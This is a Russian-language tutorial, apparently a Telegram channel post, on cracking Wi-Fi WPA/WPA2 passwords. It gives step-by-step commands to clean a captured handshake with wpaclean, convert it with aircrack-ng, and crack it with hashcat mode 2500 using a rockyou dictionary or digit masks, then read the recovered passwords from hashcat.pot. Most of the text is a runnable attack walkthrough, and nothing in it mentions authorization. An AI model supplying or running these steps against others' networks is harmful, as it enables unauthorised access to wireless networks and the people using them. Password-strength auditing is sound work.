Взлом WiFi с помощью Hashcat
https://t.me/Torchik_RuДоброго времени суток, господа. Сегодня на практике юзаем Hashcat. Погнали.
Очистка ваших файлов .cap программой wpaclean
Следующим шагом мы конвертируем файл .cap в формат, который будет понятен Hashcat (cudaHashcat или oclHashcat). Для ручной конвертации .cap используйте следующую команду в Kali Linux.
wpaclean <out.cap> <in.cap>
Обратите внимание, что, вопреки логике, сначала идёт выходной файл, а потом входной <out.cap> <in.cap>. Казалось бы, логичнее было <in.cap> <out.cap>. Обратите на это внимание, чтобы не терять время на выяснение проблемы. В моём случае команда выглядит так:
wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap
Конвертация файлов .cap в формат .hccap
Нам нужно конвертировать этот файл в формат, понятный Hashcat (cudaHashcat или oclHashcat). Для его конвертирования в формат .hccap с помощью “aircrack-ng” нам нужно использовать опцию -J
aircrack-ng <out.cap> -J <out.hccap>
Обратите внимание -J это заглавная J а не маленькая j.
В моём случае команда следующая:
aircrack-ng hs/out.cap -J hs/out
Взлом WPA2 WPA рукопожатий с Hashcat
Hashcat (cudaHashcat или oclHashcat) очень гибкие. Я охвачу только два наиболее общих и базовых сценария:
- Атака по словарю
- Атака по маске
Атака по словарю
Раздобудьте какие-нибудь словари, вроде Rockyou.Прочитайте эту заметку для детальных инструкций о том как получить файл словаря, отсортировать/очистить и т.д. Для начала нам нужно узнать, какой режим использовать для файла хендшейка WPA2 WPA. Здесь краткое изложение:
hashcat --help | grep WPA
Т.е. это 2500
Мы используем следующую команду для старта процесса взлома:
hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
Команда может отличаться. Например, я использую следующий вариант:
oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
Поскольку я установил oclHashcat.
У тех, кто установил cudaHashcat, команда выглядить так:
cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
У меня всё получилось быстро, поскольку пароль для беспроводной ТД был простым. Это заняло секунды. В зависимости от размера словаря, процесс может занять довольно много времени.
Не забываем, что если использовать атаку по словарю, то Pyrit будет намного-намного быстрее чем любая из троицы cudaHashcat или oclHashcat или Hashcat.
Про атаку по словарю уже рассказано, не будем повторяться.
Атака методом перебора — брутфорс
Теперь главная часть этой инструкции. Использование атаки методом перебора по МАСКе.
Для взлома файла рукопожатия WPA WPA2 с Hashcat (cudaHashcat или oclHashcat) используйте следующую команду:
hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d
- Где -m = 2500 означает атаку на файл рукопожатия WPA2 WPA.
- -a = 3 означает использование брутфорса (она совместима с атакой по маске).
- capture.hccap = Наш конфертированный файл .cap. Мы сгенерировали его программами wpaclean и aircrack-ng.
- ?d?d?d?d?d?d?d?d = Это наша маска, где d = цифра. Это означает, что пароль полностью состоит из цифр, например, 78964352 или 12345678 и т.д.
Я сделал маску под свою задачу, чтобы ускорить процесс. Вы можете создавать ваши собственные маски подобным образом, как объяснено в одной из статей, что выходили ранее. Если планируется использовать МАСКу многократно, то своё драгоценное творение можно сохранить в файл. Назовём его, к примеру webware-1.hcmask. Поместить его можно к остальным маскам.
/usr/share/oclhashcat/masks/webware-1.hcmask.
Кстати, посмотреть дефолтныей файлы МАСОК, поставляемых с oclHashcat можно здесь:
ls /usr/share/oclhashcat/masks/
Когда я вновь захочу использовать созданную мной маску, то команда будет примерно следующая:
cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-1.hcmask
Пример файлов .hcmask file
Вы можете проверить содержимое файла образца .hcmask следующей командой:
tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Эти файлы образцов можно использовать в оригинальном виде с Hashcat (cudaHashcat или oclHashcat) или отредактировать под свои нужды.
Расположение взломанных паролей
Hashcat (cudaHashcat или oclHashcat) сохраняет все раскрытые пароли в файл. Вы найдёте его в той же рабочей директории, где вы запустили Hashcat. В моём случае я запускал все команды из моей домашней директории, т. е. в /root
cat hashcat.pot
Заключение
Мы рассмотрели все основные приёмы перебора паролей по маске. Тем не менее, отсылаю вас к официальному сайту hashcat.net, к его вики и инструкциям. Там вы найдёте дополнительную информацию. Также необходимо помнить, что существуют ещё и другие типы атак: атака по отпечаткам, гибридная атака, перестановочная атака, атака основанная на правиле, табличная атака, атака с переключением раскладки.
Информацию о них вы найдёте на официальном сайте (на английском языке).